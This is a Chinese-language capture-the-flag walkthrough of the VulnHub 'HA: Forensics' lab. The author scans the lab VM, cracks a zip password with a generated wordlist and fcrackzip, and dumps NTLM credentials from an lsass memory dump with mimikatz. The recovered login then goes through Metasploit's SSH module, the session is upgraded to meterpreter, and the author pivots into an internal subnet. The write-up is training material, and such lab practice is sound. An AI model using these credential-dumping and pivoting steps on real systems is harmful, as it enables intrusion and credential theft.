VulnHub渗透测试实战靶场-HA: FORENSICS

Posted 2021-09-09 H3rmesk1t

VulnHub渗透测试实战靶场-HA: FORENSICS

• 题目描述
• 环境下载
• HA: FORENSICS靶机搭建
• 渗透测试
• • 信息搜集
  • Flag获取
  • • Flag-1
    • Flag-2
    • Flag-3
    • Flag-4

题目描述

HA: Forensics is an intermediate level of the lab, which gives you a hand on real-life experience in Cyber Forensic Investigation. This lab is completely dedicated to methods and tools of Cyber Forensic Investigation and there is evidence that can be found with various techniques. As it is a Capture-the-Flag, it is very important to note that it is not a root challenge, and comes with a primary motive to find all the flags.

No. of Flags: 4

Objective: Find all 4 flags (Getting Root is NOT the objective)

环境下载

戳此进行环境下载

HA: FORENSICS靶机搭建

将下载好的靶机环境，导入VMware，将其网络适配设置为NAT模式，运行即可

渗透测试

信息搜集

• 用arp-scan探测一下网段内目标靶机的IP：sudo arp-scan -l
• 得到目标靶机的IP为：192.168.246.142

• 使用 nmap 扫描开放的端口：sudo nmap -T4 -sS -A -Pn 192.168.246.142，发现开放了 22、80 两个端口

• 使用 dirb 扫描一下开放的 80 端口：dirb http://192.168.246.142

Flag获取

Flag-1

• 根据 dirb 扫描结果，访问 http://192.168.246.142/images/，最后两张图片名字具有可疑性

• 用 HxD 打开 fingerprint.jpg 发现 Flag-1

Flag-2

• 扫描备份文件发现存在 tips.txt，访问 http://192.168.246.142/tips.txt

• 下载 flag.zip 发现是加密的，访问 http://192.168.246.142/igolder/，发现 clue.txt 文件中存在 PGP 生成的私钥及使用公钥加密的信息，利用在线网站解密 PGP，得到

In case the forensic investigator forgets his password, this hint can help him, where the password is of 6 characters long , starting  3 characters is the word  "for" and the ending 3 characters are numeric

• 根据提示生成密码本，再用 fcrackzip 进行爆破 fcrackzip -D -p passwd.txt flag.zip，得到密码为 for007

f = open(r'./passwd.txt','a')
for i in range(0,1000):
    if len(str(i)) < 2:
        print('for00' + str(i),file=f)
    elif len(str(i)) < 3:
        print('for0' + str(i),file=f)
    else:
        print('for' + str(i),file=f)

• 解压压缩包，在 PDF 内拿到 Flag-2

Flag-3

• 观察到 flag.zip 内还有转存文件 lsass.DMP，通过 mimikatz 来获取信息

mimikatz # sekurlsa::minidump lsass.dmp

mimikatz # sekurlsa::logonPasswords full

• 对 NTLM 进行解密，得到一组用户名和密码：jasoos:Password@1
• 利用 msfconsole 登录 ssh 服务

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.246.142
set username jasoos
set password Password@1
exploit

• 利用 session -u 升级成一个 meterpreter 会话

sessions -l
sessions -u 1
sessions -l
sessions 2

• 将 shell 转为交互式的 shell：python -c 'import pty;pty.spawn("/bin/bash")'
• 执行 ifconfig 查看网络连接状态，发现还存在其它网段

• 利用 msfconsole 后渗透模块的路由添加功能，添加网络路由然后对目标网络进行扫描，发现一台目标机器 172.17.0.2

set session 3
exploit
use post/multi/gather/ping_sweep
set session 3 
set rhosts 172.17.0.0/24
exploit

• 接着对目标进行端口扫描，发现目标开放了 21 端口

use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.2
set ports 1-2000
exploit

• 尝试匿名登录 ftp，成功登录并在 pub 目录下发现文件 saboot.001，用 get 命令下载下来查看

• 在靶机起一个 http 服务，然后在 kali 上访问服务下载文件，得到 Flag-3

Flag-4

• 在上一步的压缩包内还有一个文件 creds.txt，有一串 base64 字符串：amVlbmFsaWlzYWdvb2RnaXJs，解密得到 jeenaliisagoodgirl

• 尝试用解密得到的字符串登录靶机账户，经过尝试后发现可以登录 forensic 用户，切换到该用户，发现其在 sudo 组里面，可以直接查看 root 目录中的文件，拿到 Flag-4